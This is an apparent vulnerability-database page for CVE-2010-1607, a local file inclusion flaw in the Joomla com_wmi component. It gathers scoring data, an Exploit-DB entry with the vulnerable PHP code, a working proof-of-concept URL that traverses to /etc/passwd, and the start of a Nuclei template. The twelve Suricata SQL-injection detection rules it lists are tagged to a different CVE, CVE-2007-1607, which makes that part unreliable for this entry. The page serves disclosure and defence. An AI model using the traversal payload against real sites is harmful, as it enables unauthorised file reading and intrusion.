CVE-2010-1607
published 2010-04-29CVE-2010-1607: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to…
PriorityP346medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
8.18%
94.2th percentile
Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| paysyspro | com_wmi | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UNION SELECT
suricata·2010-07-30·CVSS 5.0
CVE-2007-1607 [MEDIUM] ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UNION SELECT
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UNION SELECT"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"search_forum="; nocase; content:"UNION"; nocase; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-1607; reference:url,www.securityfocus.com/bid/23057; classtype:web-application-attack; sid:2004129; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, m
Suricata
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user ASCII
suricata·2010-07-30·CVSS 5.0
CVE-2007-1607 [MEDIUM] ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user ASCII
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user ASCII"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"search_user="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-1607; reference:url,www.securityfocus.com/bid/23057; classtype:web-application-attack; sid:2004138; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre
Suricata
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum SELECT
suricata·2010-07-30·CVSS 5.0
CVE-2007-1607 [MEDIUM] ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum SELECT
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum SELECT"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"search_forum="; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-1607; reference:url,www.securityfocus.com/bid/23057; classtype:web-application-attack; sid:2004128; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techniqu
Suricata
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UPDATE
suricata·2010-07-30·CVSS 5.0
CVE-2007-1607 [MEDIUM] ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UPDATE
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UPDATE"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"search_forum="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-1607; reference:url,www.securityfocus.com/bid/23057; classtype:web-application-attack; sid:2004133; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_02, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mit
Suricata
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UNION SELECT
suricata·2010-07-30·CVSS 5.0
CVE-2007-1607 [MEDIUM] ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UNION SELECT
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UNION SELECT"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"search_user="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-1607; reference:url,www.securityfocus.com/bid/23057; classtype:web-application-attack; sid:2004135; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_02, mitre_tactic_id TA0001,
Suricata
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UPDATE
suricata·2010-07-30·CVSS 5.0
CVE-2007-1607 [MEDIUM] ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UPDATE
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UPDATE"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"search_user="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-1607; reference:url,www.securityfocus.com/bid/23057; classtype:web-application-attack; sid:2004139; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_
Suricata
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum ASCII
suricata·2010-07-30·CVSS 5.0
CVE-2007-1607 [MEDIUM] ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum ASCII
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum ASCII"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"search_forum="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-1607; reference:url,www.securityfocus.com/bid/23057; classtype:web-application-attack; sid:2004132; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_02, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mi
Suricata
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum INSERT
suricata·2010-07-30·CVSS 5.0
CVE-2007-1607 [MEDIUM] ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum INSERT
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum INSERT"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"search_forum="; nocase; content:"INSERT"; nocase; pcre:"/INSERT.+INTO/i"; reference:cve,CVE-2007-1607; reference:url,www.securityfocus.com/bid/23057; classtype:web-application-attack; sid:2004130; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techniqu
Suricata
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user INSERT
suricata·2010-07-30·CVSS 5.0
CVE-2007-1607 [MEDIUM] ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user INSERT
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user INSERT"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"search_user="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-1607; reference:url,www.securityfocus.com/bid/23057; classtype:web-application-attack; sid:2004136; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre
Suricata
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user DELETE
suricata·2010-07-30·CVSS 5.0
CVE-2007-1607 [MEDIUM] ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user DELETE
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user DELETE"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"search_user="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-1607; reference:url,www.securityfocus.com/bid/23057; classtype:web-application-attack; sid:2004137; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre
Suricata
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum DELETE
suricata·2010-07-30·CVSS 5.0
CVE-2007-1607 [MEDIUM] ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum DELETE
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum DELETE"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"search_forum="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-1607; reference:url,www.securityfocus.com/bid/23057; classtype:web-application-attack; sid:2004131; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techniqu
Suricata
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user SELECT
suricata·2010-07-30·CVSS 5.0
CVE-2007-1607 [MEDIUM] ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user SELECT
ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user SELECT"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"search_user="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-1607; reference:url,www.securityfocus.com/bid/23057; classtype:web-application-attack; sid:2004134; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_02, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre
Exploit-DB
Joomla! Component WMI 1.5.0 - Local File Inclusion
exploitdb·2010-04-21
CVE-2010-1607 Joomla! Component WMI 1.5.0 - Local File Inclusion
Joomla! Component WMI 1.5.0 - Local File Inclusion
---
Title : Joomla Component wmi (com_wmi) LFI Vulnerability
Vendor : http://www.paysyspro.com/
Download : http://www.paysyspro.com/jotloader/files.download/3
Date : Sunday, 21 April 2010 - GMT +07:00 Jakarta, Indonesia
Author : wishnusakti + inc0mp13te (HH)
Contact : evileyes60117[at]yahoo.com
[+] Vulnerable
./components/com_wmi/wmi.php
// Require specific controller if requested
if($controller = JRequest::getVar( 'controller' )) {
require_once( JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php' );
}
[+] Exploit
http://[site]/[path]/index.php?option=com_wmi&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
Very Special thanks :
Penghuni #nob0dy priv8 S
Nuclei
Joomla! Component WMI 1.5.0 - Local File Inclusion
nuclei·CVSS 6.8
CVE-2010-1607 [MEDIUM] Joomla! Component WMI 1.5.0 - Local File Inclusion
Joomla! Component WMI 1.5.0 - Local File Inclusion
A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1607
info:
name: Joomla! Component WMI 1.5.0 - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthor
No writeups or analysis indexed.
http://osvdb.org/63979http://secunia.com/advisories/39539http://www.exploit-db.com/exploits/12316http://www.securityfocus.com/bid/39608https://exchange.xforce.ibmcloud.com/vulnerabilities/58032http://osvdb.org/63979http://secunia.com/advisories/39539http://www.exploit-db.com/exploits/12316http://www.securityfocus.com/bid/39608https://exchange.xforce.ibmcloud.com/vulnerabilities/58032
2010-04-29
Published